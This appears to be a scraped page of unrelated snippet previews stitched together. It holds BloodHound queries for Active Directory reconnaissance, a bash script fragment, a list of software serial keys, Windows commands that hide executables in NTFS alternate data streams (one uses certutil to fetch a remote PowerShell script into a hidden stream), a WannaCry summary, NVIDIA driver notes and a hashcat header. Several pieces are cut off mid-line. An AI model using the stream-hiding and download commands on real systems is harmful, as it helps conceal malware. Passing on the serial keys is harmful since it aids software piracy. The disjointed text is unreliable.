(THIS LIST IS OBSOLETED, check out the latest version here: https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md )
- Returns computer names and their operating system for statistics purposes
MATCH (c:Computer) WHERE c.operatingsystem is not null RETURN c.name as Name, c.operatingsystem as OS
- Returns a summary report of machines grouped by their operating systems versions, along with number of machines running specific OS version:
MATCH (c:Computer) WHERE c.operatingsystem is not null MATCH (n:Computer {operatingsystem: c.operatingsystem}) RETURN c.operatingsystem as OS, count(distinct n) AS Number ORDER BY Number DESC
#!/bin/bash | |
# DO NOT run the line 167 standalone. It will remove the necessary files besides the junk! | |
if echo $@|grep -q "\-\-help\|\-help\|\-h\|help\|\-\-h\|\-\-no\-deb\|\-\-no\-install\|\-\-no\-cleaning\|\-\-assume\-debian" | |
then : | |
else echo wrong entry\(ies\) ! | |
help=yes | |
fi | |
if echo $@|grep -q "\-\-help\|\-help\|\-h\|help\|\-\-h" || [ "$help" = yes ] |
Serial Keys: | |
FU512-2DG1H-M85QZ-U7Z5T-PY8ZD | |
CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD | |
GV7N2-DQZ00-4897Y-27ZNX-NV0TD | |
YZ718-4REEQ-08DHQ-JNYQC-ZQRD0 | |
GZ3N0-6CX0L-H80UP-FPM59-NKAD4 | |
YY31H-6EYEJ-480VZ-VXXZC-QF2E0 | |
ZG51K-25FE1-H81ZP-95XGT-WV2C0 | |
VG30H-2AX11-H88FQ-CQXGZ-M6AY4 |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
- Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
- Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
- Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
- Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
- Kill switch: If the website
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).
update: A minor variant of the viru
This was tested on a ThinkPad P70 laptop with an Intel integrated graphics and an NVIDIA GPU:
lspci | egrep 'VGA|3D'
00:02.0 VGA compatible controller: Intel Corporation Device 191b (rev 06)
01:00.0 VGA compatible controller: NVIDIA Corporation GM204GLM [Quadro M3000M] (rev a1)
A reason to use the integrated graphics for display is if installing the NVIDIA drivers causes the display to stop working properly.
In my case, Ubuntu would get stuck in a login loop after installing the NVIDIA drivers.
This happened regardless if I installed the drivers from the "Additional Drivers" tab in "System Settings" or the ppa:graphics-drivers/ppa
in the command-line.
Product: Sagitta Brutalis 1080 (PN S3480-GTX-1080-2697-128)
Software: Hashcat v3.00-beta-145-g069634a, Nvidia driver 367.18
Accelerator: 8x Nvidia GTX 1080 Founders Edition